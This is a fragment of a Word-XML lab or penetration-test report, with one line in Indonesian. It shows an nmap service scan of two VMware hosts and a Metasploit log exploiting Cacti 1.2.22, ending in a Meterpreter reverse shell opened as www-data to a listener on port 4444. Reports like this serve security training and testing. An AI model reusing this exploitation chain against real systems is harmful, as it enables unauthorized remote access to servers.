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11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Thu Jul 11 10:32:56 2024 as: nmap -sV -sC -Pn --script http-title -iL targets.txt -oN nmap_results.txt</w:t>
        <w:br/>
        <w:t>Nmap scan report for 10.33.102.225</w:t>
        <w:br/>
        <w:t>Host is up (0.00014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MAC Address: 00:50:56:97:49:B5 (VMware)</w:t>
        <w:br/>
        <w:t>Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel</w:t>
        <w:br/>
        <w:br/>
        <w:t>Nmap scan report for 10.33.102.226</w:t>
        <w:br/>
        <w:t>Host is up (0.00013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MAC Address: 00:50:56:97:D8:D2 (VMware)</w:t>
        <w:br/>
        <w:t>Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel</w:t>
        <w:br/>
        <w:br/>
        <w:t>Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .</w:t>
        <w:br/>
        <w:t># Nmap done at Thu Jul 11 10:33:04 2024 -- 2 IP addresses (2 hosts up) scanned in 8.68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Metasploit berhasil mengeksploitasi kerentanan yang ada pada aplikasi Cacti versi 1.2.22 yang dijalankan pada alamat IP 10.33.102.212 dan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Found exploitable local_data_id 15 for host_id 1</w:t>
        <w:br/>
        <w:t>[*] Command Stager progress - 100.00% done (1118/1118 bytes)</w:t>
        <w:br/>
        <w:t>[*] Sending stage (1017704 bytes) to 10.33.102.225</w:t>
        <w:br/>
        <w:t>[*] Meterpreter session 1 opened (10.33.102.224:4444 -&gt; 10.33.102.225:35958) at 2024-07-11 10:34:19 +0700</w:t>
        <w:br/>
        <w:t>resource (exploit_cacti_resource.rc)&gt; sessions -i</w:t>
        <w:br/>
        <w:br/>
        <w:t>Active sessions</w:t>
        <w:br/>
        <w:t>===============</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">  Id  Name  Type                  Information            Connection</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --  ----  ----                  -----------            ----------</w:t>
        <w:br/>
        <w:t xml:space="preserve">  1         meterpreter x86/linu  www-data @ 172.24.0.3  10.33.102.224:4444 -&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">            x                                             10.33.102.225:35958</w:t>
        <w:br/>
        <w:t xml:space="preserve">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